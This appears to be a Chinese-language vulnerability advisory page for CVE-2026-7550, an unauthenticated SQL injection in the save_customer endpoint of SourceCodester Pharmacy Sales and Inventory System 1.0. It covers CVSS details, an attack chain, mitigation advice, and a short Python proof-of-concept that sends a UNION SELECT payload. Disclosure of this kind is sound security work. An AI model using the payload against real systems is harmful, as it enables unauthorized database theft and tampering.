IPBUF安全漏洞报告
English
CVE-2026-7550 CVSS 7.3 高危

CVE-2026-7550 SourceCodester药店系统SQL注入漏洞

披露日期: 2026-05-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7550
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Pharmacy Sales and Inventory System

相关标签

SQL注入SourceCodesterPharmacy Sales and Inventory SystemCVE-2026-7550

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本中的/ajax.php?action=save_customer接口存在SQL注入漏洞。由于对参数ID缺乏适当的输入验证,未经身份验证的远程攻击者可以通过发送恶意构造的请求来执行任意SQL语句,从而窃取、修改或破坏数据库中的敏感信息。

技术细节

该漏洞位于Pharmacy Sales and Inventory System 1.0的/ajax.php文件中的save_customer动作。系统在处理用户提交的ID参数时,未对其进行有效的过滤或转义,直接将其拼接到SQL查询语句中。由于CVSS向量显示无需认证(PR:N)且无需用户交互(UI:N),攻击者可利用此漏洞通过网络发起攻击。成功利用后,攻击者可获取数据库的低权限读写及修改能力,影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行SourceCodester Pharmacy Sales and Inventory System 1.0。
STEP 2
武器化
攻击者构造针对ID参数的恶意SQL注入Payload。
STEP 3
交付
攻击者向/ajax.php?action=save_customer发送包含恶意Payload的HTTP POST请求。
STEP 4
利用
服务器端未过滤ID参数,直接执行攻击者注入的SQL语句。
STEP 5
影响
攻击者成功获取数据库敏感信息或篡改数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-site/ajax.php" params = {"action": "save_customer"} # Malicious payload for SQL injection payload_data = { "ID": "1' UNION SELECT NULL, NULL, version(), NULL-- -" } try: response = requests.post(target_url, params=params, data=payload_data) if response.status_code == 200: print("Vulnerability confirmed!") print(response.text) except Exception as e: print(f"Exploit failed: {e}")

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施
建议立即限制对/ajax.php文件的公网访问,或部署Web应用防火墙(WAF)规则以拦截针对该参数的SQL注入攻击,直至官方发布安全补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表